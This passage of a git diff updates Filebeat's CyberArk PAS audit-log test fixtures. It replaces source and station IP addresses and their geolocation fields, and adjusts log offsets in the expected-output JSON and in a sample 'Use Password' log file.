ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:33:30", "destination.address": "34.123.103.115", - 
"destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm disconnect", @@ -815,7 +764,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 25322, + "log.offset": 25298, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -825,24 +774,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -871,23 +817,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:01:13", "cyberarkpas.audit.extra_details.session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:34:50Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:34:50", "destination.address": "34.123.103.115", - 
"destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm disconnect", @@ -909,7 +850,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 28386, + "log.offset": 28356, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -919,24 +860,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -965,23 +903,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:37:10", "cyberarkpas.audit.extra_details.session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T11:12:09Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 04:12:09", "destination.address": "34.123.103.115", - 
"destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm disconnect", @@ -1003,7 +936,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 31450, + "log.offset": 31414, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1013,24 +946,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1055,23 +985,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:00:05", "cyberarkpas.audit.extra_details.session_id": "692fe25f-f940-4170-8ea4-5241b35173f0", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:18:36Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 06:18:36", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North 
America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", @@ -1093,7 +1018,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 34514, + "log.offset": 34472, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1103,24 +1028,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "adrian" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1145,23 +1067,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:00:06", "cyberarkpas.audit.extra_details.session_id": "f5725611-ca57-4a2a-a089-f45b3174a358", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:11Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 07:08:11", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North 
America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", @@ -1183,7 +1100,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 37110, + "log.offset": 37062, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1193,24 +1110,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "adrian" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1243,23 +1157,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:00:09", "cyberarkpas.audit.extra_details.session_id": "7db90436-8a1a-4203-9a96-65137625ab2d", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:36Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 07:08:36", "destination.address": 
"34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm disconnect", @@ -1281,7 +1190,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 39706, + "log.offset": 39652, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1291,24 +1200,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1341,23 +1247,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:49:12", "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T15:00:21Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 08:00:21", "destination.address": 
"34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm disconnect", @@ -1379,7 +1280,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 43552, + "log.offset": 43492, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1389,24 +1290,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log index 8c77aabf9097..bfb67998dd86 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log 
@@ -1,11 +1,11 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 308\n Use Password\n Info\n adm2\n Use Password\n \n \n Windows\n Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\n 10.2.0.6\n \n \n \n (Action: Connect)\n \n Use Password\n 10.2.0.3\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"308","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Use Password","Severity":"Info","Issuer":"adm2","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"Windows","File":"Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2","Station":"10.2.0.6","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)","ExtraDetails":"","Message":"Use Password","GatewayStation":"10.2.0.3","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WIN-SERVER-LOCAL"},{"Name":"UserName","Value":"Administrator2"},{"Name":"Address","Value":"dbserver.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"LogonDomain","Value":"DBServer"},{"Name":"SequenceID","Value":"1"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"LastSuccessReconciliation","Value":"1604944215"},{"Name":"Customer","Value":"EvilCorp"}]}}}} -<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:27Z 
VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 